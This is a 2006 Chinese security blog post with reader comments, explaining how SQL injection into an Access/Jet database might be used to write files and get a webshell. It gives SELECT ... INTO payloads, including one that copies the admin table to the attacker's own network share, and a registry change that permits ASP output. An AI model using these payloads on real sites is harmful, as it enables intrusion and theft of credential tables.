lake2的专栏

千秋邈矣独留我,百战归来再读书

lake2ID:lake2
213694次访问,排名289好友0人,关注者5
lake2的文章
原创 65 篇
翻译 0 篇
转载 0 篇
评论 573 篇
lake2的公告
好好学习
最近评论
mohroq:wow gold,
asd1220:那这么说,是不是微软的IE浏览器用户不会被CSRF所攻击呢?是不是只要将连接从新的窗口里打开就可以避免CSRF攻击呢?

PS:这个不会成为遭受木马攻击的一种途径吧?
flysont:用诺基亚1116
gghhyy:和《web 入侵 安全测试与对策》内容一致!
gghhyy:<web 入侵安全测试与对策>中会话劫持一节。
和你说的好像100%一致啊!
文章分类
收藏
    相册
    文章相关
    文章相关2
    About
    0x54.org
    Defence80
    个人主页
    Friends
    BaiShi(RSS)
    kuhanzhu
    lanker
    lis0
    LoveShell
    NetSnow
    Niklen
    p4nny
    SuperHei
    全金属外壳
    剑行天下
    听风吹雨
    烟花剑客
    Online
    CSDN Search
    Google
    Microsoft Search
    Query sth.
    Technology
    CSDN.net
    Eviloctal Forum
    nsfocus
    Ph4nt0m
    xfocus
    World
    凯迪社区
    新浪读书
    网易新闻
    存档
    软件项目交易
    订阅我的博客
    XML聚合  FeedSky
    订阅到鲜果
    订阅到Google
    订阅到抓虾
    订阅到BlogLines
    订阅到Yahoo
    订阅到GouGou
    订阅到飞鸽
    订阅到Rojo
    订阅到newsgator
    订阅到netvibes

    原创 SQL注入Access导出WebShell?收藏

    新一篇: 用手机控制服务器 | 旧一篇: Serv-U的反弹攻击及其利用

    已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。

    最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。

    几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txthtmhtml等格式)的方法:

     

    SELECT * into [test.txt] in 'd:\web\' 'text;' from admin

     

    执行上述语句,在d:\web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。

    其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINE\Software\Microsoft\Jet\4.0\Engines\Text\DisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。

    这个方法跟那个调用AccessShell函数执行命令一样,要修改注册表,所以利用不是很大。

    顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin

     

    发表于 @ 2006年11月23日 18:57:00|评论(loading...)|编辑

    新一篇: 用手机控制服务器 | 旧一篇: Serv-U的反弹攻击及其利用

    评论

    #高手 发表于2006-11-23 19:33:00  IP: 60.176.148.*
    #无名 发表于2006-11-23 22:27:00  IP: 221.1.174.*
    没有什么意思,就是崇拜你,你是牛人.我是菜鸟,希望你多发原创文章..我时时刻刻关注..
    #无名 发表于2006-11-23 21:40:00  IP: 221.1.174.*
    我在CSDN看BLOG,,一看标题就点进来,心想有谁这么有胆子敢在CSDN贴这个,一看是你,不敢说什么了,崇拜你.哈哈!!
    #无名 发表于2006-11-23 21:40:00  IP: 221.1.174.*
    我在CSDN看BLOG,,一看标题就点进来,心想有谁这么有胆子敢在CSDN贴这个,一看是你,不敢说什么了,崇拜你.哈哈!!
    #无名 发表于2006-11-23 21:41:00  IP: 221.1.174.*
    我KAO,怎么发了两次..
    #不会游泳的鱼 发表于2006-11-23 21:41:00  IP: 221.232.131.*
    的确利用不大,如果能改注册表就不用这个了.
    #不会游泳的鱼 发表于2006-11-23 21:43:00  IP: 221.232.131.*
    本来以为有个板凳坐坐的,被你小子抢了
    #lake2 发表于2006-11-23 22:06:00  IP: 222.210.116.*
    无名你什么意思啊,CSDN不能贴这个吗?我难得上来一次不懂规矩,指教下
    #kuhanzhu 发表于2006-11-24 11:59:00  IP: 218.72.146.*
    可能会因为权限问题连txt都不能
    不过看了这文章发现,原来ACCESS也是很强的~只是盖茨老爷不告诉我们,非让我们自己挖掘而已
    #kk 发表于2006-11-25 10:26:00  IP: 218.19.125.*
    好像x档案有一篇文章是说这个东东的~~~~
    #whytt 发表于2006-11-26 14:44:00  IP: 220.166.1.*
    哈哈~~明白鸟,原来后缀是有注册表来控制的,用来做后门还可以 :)
    #TTFCT 发表于2006-11-26 21:04:00  IP: 220.167.24.*
    LAKE2,说了做个友情连接的,莫忘了,我都把你的加起了
    #肉丝 发表于2006-11-27 19:08:00  IP: 218.62.42.*
    呵呵其实还是不错的了,这个方法可以导出csv报表,在一些网站的应用中还是不错的.
    #sfgkwfnh 发表于2006-12-27 14:25:56  IP: 125.71.66.*
    狂汗……少写些我看不懂的文章好不!?
    大哥, 我还有自信活在这个世界上吗!?
    #sfgkwfnh 发表于2006-12-27 14:26:31  IP: 125.71.66.*
    狂汗……少写些我看不懂的文章好不!?
    大哥, 我还有自信活在这个世界上吗!?
    #stealthwalker 发表于2007-11-09 18:20:29  IP: 218.57.182.*
    这种方法在注入里根本就不能用,单独用肯定没问题。但是放到有注入点的语句中就不行了,子查询不支持这种查询语句,联合查询就更不行了。这两种查询都不能用,那还用个P啊
    发表评论  


    当前用户设置只有注册用户才能发表评论。如果你没有登录,请点击登录
    Csdn Blog version 3.1a
    Copyright © lake2